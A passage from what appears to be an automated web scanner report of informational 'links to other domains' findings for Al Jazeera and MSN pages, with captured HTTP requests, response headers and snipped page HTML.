<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A0">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406045&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Feditorial.autos.msn.com%2Fslideshow.aspx%3Fcp-documentid%3D1166546%26icid%3Dautos_1656%26GT1%3D22013&amp;lc=1033&amp;id=72801" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Ford+2010+profit+highest&amp;form=MSNS06">ford highest profit</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+green+loan&amp;form=MSNS06">GM 'green' loan</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&amp;form=MSNS06">volt sales</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=south+korea+kia+net+profit&amp;form=MSNS06">kia motors hits record</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X72Io-5auVvY-8btV9251TCSKG40_VZxx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X_t6K-EaUbIh3_tYVkO8BnzB9gHI4CIgE?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsC4ZRmfeIEzEEQW5YCixM1lXYonrWoK7?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGXMlAxWeDCbzyoCuBzwzvlb7pBVrwr34?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d83c9b6bbd817d47.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d83c9b6bbd817d47.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X5tTHfv3Bm8_l2BgWB7OTLnEh7WGUBHQ5?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-809a54fe28e4fb91.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">G
..(oldsfun)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-809a54fe28e4fb91.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-fabb604b537e099b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">tomas rodriguez
..(faithfulguy)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-fabb604b537e099b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://blufiles.storage.redacted/y1mvBJI1-3_evpb5PLbkQ7UhKwWBlu-_k15jCbRD5IiL3-jDSI4NgsiHW_RMTWTTS42RGem4BaOcYI7Ro-W8YeGNebwJATcVulU" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XMnI-raJfRqPvRnEeB_hC1RKeNIy0lfkA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAOGnzxr5PxuVa8kggGJBInauOzJMDUUg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X391Bn0BHZY_-wopsWAO-dk8XKY4wrjwM?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XcdDNRXWFQsUczA6RfKwNPNLNf7lMyoD8?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xrx5RHb8jEF9RC6BEHp4hC_RTC2eAWJfg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XUMaGfQinvYL_rkKruQ9NhYT6Cn6CVbzD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XmuwNUslX0aJ6_2eqL8Bmq-MyAkfuL9kg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xuo2PiOvdO1KWWELNX2bjqCDPhTQFttLg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XwKJJgcnOzooBeiHlda2GVW4uprKR5o1M?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XXVkc4CMEweMYJswTzdbHi7fZPcM_FZVA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCxJJ9-mWAInyzGx8O8xUausF8ubdPTmG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>With so many new vehicles on the market, picking just one is a challenge, especially if you're looking for a new <a href="http://www.bing.com/search?q=pickup+truck&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">pickup truck</a>. Not only are there multiple manufacturers, each with more than one model to choose from, but each pickup comes in a bewildering variety of <a href="http://www.bing.com/search?q=cab+styles&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">cab styles</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Ford+Ranger&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=Nissan+Frontier&amp;FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Dodge+Dakota+Accessories&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Ford+F-350+Super+Duty&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<li>Become a fan of <a href="http://www.facebook.com/MSNAutos" onclick="window.open(this.href);return false;">MSN Autos on Facebook</a>
...[SNIP]...
</em> <a href="https://canvas.dealix.com/newcars/default.aspx?refid=58940&amp;detid=88000&amp;lnx=msndlx" onclick="window.open(this.href);return false;">get a free price quote</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalauto.112.2O7.net/b/ss/msnportalauto/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.76. http://english.aljazeera.net/_inc/adsrc.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://english.aljazeera.net
Path:   /_inc/adsrc.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_inc/adsrc.html?'+ord+' HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Referer: http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:45:25 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
Content-Length: 2046
ETag: "bf291890be4dcb1:cfb"
Last-Modified: Mon, 06 Sep 2010 12:25:16 GMT
Content-Type: text/html
Age: 135
X-Cache: HIT from 12.120.11.63
Via: 1.1 12.120.11.63:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

<html>
<body marginheight=0 marginwidth=0 topmargin=0 leftmargin=0>
<!-- begin ad tag: aljazeera_EN/africa (468x60) -->
<script language="JavaScript" type="text/javascript">

var str = window.p
...[SNIP]...
<noscript>
<a href="http://ad.ae.doubleclick.net/jump/aljazeera_EN/;ord=123456789?" target="_blank"><img src="http://ad.ae.doubleclick.net/ad/aljazeera_EN/;ord=123456789?" width="" height="" border="0" alt=""></a>
...[SNIP]...

22.77. http://entertainment.redacted/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news/?ipp=15 HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62332
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=8a5a59dee68945d08f92f03252676946; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:48:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Just In Ne
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css" />

<STYLE>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406113&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<DIV class=titleBar3>Celebrity News, Photos..& Gossip..<a href=http://feeds.wonderwall.com/rss/wall.xml class="altlink"><IMG border=0 src="http://entimg.msn.com/i/ms/rssicon.gif">
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<P><a href=http://www.bing.com/search?q=cheryl+burke&amp;form=msnena class="altlink" target="new">Cheryl Burke</a>
...[SNIP]...
</P><a href=http://www.bing.com/search?q=jimmy+buffett&amp;form=msnena class="altlink" target="new">Jimmy Buffett</a>
...[SNIP]...
<DIV class=GossipSummaryContentDiv><a href=http://www.bing.com/videos/browse/Sundance class="altlink"><STRONG>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.78. http://entertainment.redacted/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /news/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /news/?ipp=15 HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 62440
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=1c50334278564aa1b74292ad53e492f6; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:46:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Just In Ne
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/e9613.css" rev="stylesheet" type="text/css"/>
<style>
...[SNIP]...
</style>
<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="http://stc.alphablu.msn-int.com/br/chan/css/1/cntwmodule.css" />

<STYLE>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home" rel="">Careers &amp; Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps &amp; Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections &amp; Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a25">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344775&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fentertainment.redacted%2Fnews%2F%3Fipp%3D15&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fentertainment.redacted%2fnews%2f%3fipp%3d15%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.redacted"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<DIV class=titleBar3>Celebrity News, Photos..& Gossip..<a href=http://feeds.wonderwall.com/rss/wall.xml class="altlink"><IMG border=0 src="http://entimg.msn.com/i/ms/rssicon.gif">
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fentertainment.msn.com%2fnews%2f%3fipp%3d15%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<P><a href=http://www.bing.com/search?q=cheryl+burke&amp;form=msnena class="altlink" target="new">Cheryl Burke</a>
...[SNIP]...
</P><a href=http://www.bing.com/search?q=jimmy+buffett&amp;form=msnena class="altlink" target="new">Jimmy Buffett</a>
...[SNIP]...
<TD class=rp5 width=75 align=left><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink"><IMG border=0 alt=Bing src="http://entimg.msn.com/i/140/ent/bingbar_140.jpg" width=140 height=101>
...[SNIP]...
<STRONG><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink">Sundance 2011</a>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

22.79. http://entertainment.redacted/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://entertainment.msn.com
Path:   /video/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /video/?from=en-us_msnhp HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 26764
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
